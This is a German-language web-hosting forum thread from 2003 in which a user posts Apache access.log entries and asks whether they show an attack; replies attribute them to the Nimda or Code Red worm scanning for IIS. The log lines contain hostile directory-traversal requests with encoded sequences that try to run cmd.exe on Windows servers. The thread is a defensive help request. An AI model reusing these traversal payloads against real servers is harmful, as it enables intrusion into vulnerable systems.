Einträge in access.log

Rund um die Sicherheit des Systems und die Applikationen
Post Reply
paul30k
Posts: 13
Joined: 2003-05-05 22:37
 

Einträge in access.log

Post by paul30k »

Hallo alle zusammen,

habe in der access.log folgende Einträge zu stehen:

217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

Diese wiederholen sich jeden Tag zur etwa gleichen Zeit. Kann mir vielleicht jemand sagen, was das zu bedeuten hat? Ist das ein Angriff? Und denkt dieser eventuelle Angreifer er hätte einen ISII vor sich (statt Apache 1&1-Server)?
Für jeden Tip dankbar.

Gruß,
Paul
scythe42
Posts: 154
Joined: 2002-10-14 18:30
Location: Internet
Contact:
 

Re: Einträge in access.log

Post by scythe42 »

Das ist kein Angreifer, sonder neun Wurm, der wohl ohne Wissen des Besitzers sein Unwesen treibt. In dem Falle ist es "Nimda". Brauchst dir keine Sorgen machen, dieser Wurm kann bei dir keinen Schaden anrichten.

http://www.symantec.com/avcenter/venc/d ... .a@mm.html
kahler
Posts: 130
Joined: 2003-04-18 17:42
Location: /root
 

Re: Einträge in access.log

Post by kahler »

Würde sagen, dass ist Code Red 2, der versucht einen ISS anzugreifen.
Brauchst dir also keine Gedanken zu machen.
paul30k
Posts: 13
Joined: 2003-05-05 22:37
 

Re: Einträge in access.log

Post by paul30k »

Oh, vielen Dank für die schnelle Antwort. Mich hat nur gewundert, daß das Teil immer wieder versucht den Server anzugreifen. Puhh.

Gruß,
Paul
Post Reply